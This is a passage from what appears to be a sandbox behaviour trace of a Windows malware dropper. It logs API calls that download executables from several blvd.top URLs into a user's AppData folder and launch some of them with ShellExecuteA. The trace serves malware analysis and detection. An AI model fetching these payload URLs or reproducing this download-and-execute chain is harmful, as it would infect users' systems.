nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0xa00, lpOverlapped=0x0) returned 1 [0167.286] CloseHandle (hObject=0x5f0) returned 1 [0167.352] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0167.359] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0167.623] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0174.804] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31bffe0 | out: hHeap=0x260000) returned 1 [0174.804] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f6ee8 | out: hHeap=0x260000) returned 1 [0174.804] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31aa150 | out: hHeap=0x260000) returned 1 [0174.813] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0175.506] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac6c8 [0175.514] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x31a9ec0 [0175.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31ac6c8, cbMultiByte=-1, lpWideCharStr=0x31a9ec0, cchWideChar=1072 | out: lpWideCharStr="http://blvd.top/files/penelop/updatewin2.exe") returned 45 [0175.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x870) returned 0x321f290 [0175.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9ec0 | out: hHeap=0x260000) returned 1 [0175.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac6c8 | out: hHeap=0x260000) returned 1 [0175.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x870) returned 0x31a9ec0 [0175.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9af5eb0 [0175.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://blvd.top/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x9af5eb0, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://blvd.top/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0175.523] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x840) returned 0x9af6738 [0175.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9af5eb0 | out: hHeap=0x260000) returned 1 [0175.523] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9ec0 | out: hHeap=0x260000) returned 1 [0175.523] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://blvd.top/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0176.912] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9af6738 | out: hHeap=0x260000) returned 1 [0176.912] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9a2d6d0, lpdwBufferLength=0x9a2d710, lpdwIndex=0x0 | out: lpBuffer=0x9a2d6d0*, lpdwBufferLength=0x9a2d710*=0x4, lpdwIndex=0x0) returned 1 [0176.912] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x32214e0 [0176.912] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x321c580 [0176.913] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x32214e0 | out: hHeap=0x260000) returned 1 [0176.913] lstrcpyA (in: lpString1=0x31b9668, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8" [0176.913] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe") returned 1 [0176.913] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x31c0250 [0176.913] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6bc [0176.913] SetFilePointer (in: hFile=0x6bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0176.913] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0176.915] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0176.917] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.268] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.268] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.270] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.271] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.271] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.271] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.800] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.801] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.802] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.802] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.802] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.803] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.803] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.804] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.804] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.805] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.841] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.842] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.842] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.843] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.844] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.845] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.846] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.847] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.908] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.909] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.913] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.913] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.914] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.914] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.915] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.915] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.915] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.916] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.916] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.917] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.926] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.926] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.927] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.927] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.951] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.951] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.954] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.955] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x2800) returned 1 [0177.956] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0177.957] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a2d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a2d6d8 | out: lpBuffer=0x9a2d778*, lpdwNumberOfBytesRead=0x9a2d6d8*=0x1200) returned 1 [0177.957] WriteFile (in: hFile=0x6bc, lpBuffer=0x9a2d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x9a2d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a2d778*, lpNumberOfBytesWritten=0x9a2d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0177.958] CloseHandle (hObject=0x6bc) returned 1 [0177.966] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0177.975] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0177.975] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0178.070] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c0250 | out: hHeap=0x260000) returned 1 [0178.070] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321c580 | out: hHeap=0x260000) returned 1 [0178.070] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x321f290 | out: hHeap=0x260000) returned 1 [0178.070] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0178.070] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x31f8770 [0178.070] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x85e) returned 0x31a9ec0 [0178.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f8770, cbMultiByte=-1, lpWideCharStr=0x31a9ec0, cchWideChar=1071 | out: lpWideCharStr="http://blvd.top/files/penelop/updatewin.exe") returned 44 [0178.070] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x9b03f30 [0178.071] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9ec0 | out: hHeap=0x260000) returned 1 [0178.071] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8770 | out: hHeap=0x260000) returned 1 [0178.071] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x860) returned 0x31a9ec0 [0178.071] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x82f) returned 0x9af6738 [0178.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://blvd.top/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x9af6738, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://blvd.top/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0178.071] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9af5eb0 [0178.071] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9af6738 | out: hHeap=0x260000) returned 1 [0178.071] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9ec0 | out: hHeap=0x260000) returned 1 [0178.071] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://blvd.top/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0178.245] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9af5eb0 | out: hHeap=0x260000) returned 1 [0178.245] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9a2d6d0, lpdwBufferLength=0x9a2d710, lpdwIndex=0x0 | out: lpBuffer=0x9a2d6d0*, lpdwBufferLength=0x9a2d710*=0x4, lpdwIndex=0x0) returned 1 [0178.245] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9b03f30 | out: hHeap=0x260000) returned 1 [0178.245] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0178.245] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x31f8770 [0178.246] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x84e) returned 0x31f8fe8 [0178.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f8770, cbMultiByte=-1, lpWideCharStr=0x31f8fe8, cchWideChar=1063 | out: lpWideCharStr="http://blvd.top/files/penelop/3.exe") returned 36 [0178.246] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x850) returned 0x31a9ec0 [0178.246] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8fe8 | out: hHeap=0x260000) returned 1 [0178.246] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8770 | out: hHeap=0x260000) returned 1 [0178.246] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x850) returned 0x31f8fe8 [0178.246] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x827) returned 0x9b03f30 [0178.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://blvd.top/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x9b03f30, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://blvd.top/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0178.246] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x830) returned 0x9af5eb0 [0178.246] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9b03f30 | out: hHeap=0x260000) returned 1 [0178.246] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f8fe8 | out: hHeap=0x260000) returned 1 [0178.246] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://blvd.top/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0178.457] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x9af5eb0 | out: hHeap=0x260000) returned 1 [0178.457] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x9a2d6d0, lpdwBufferLength=0x9a2d710, lpdwIndex=0x0 | out: lpBuffer=0x9a2d6d0*, lpdwBufferLength=0x9a2d710*=0x4, lpdwIndex=0x0) returned 1 [0178.457] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31a9ec0 | out: hHeap=0x260000) returned 1 [0178.458] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0178.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x31f8968 [0178.458] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x84e) returned 0x31a9ec0 [0178.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31f8968, cbMultiByte=-1, lpWideCharStr=0x31a9ec0, cchWideChar=1063 | out: lpWideCharStr="http://blvd.top/files/penelop/4.exe") returned 36 [0178.458] RtlAllocateHeap 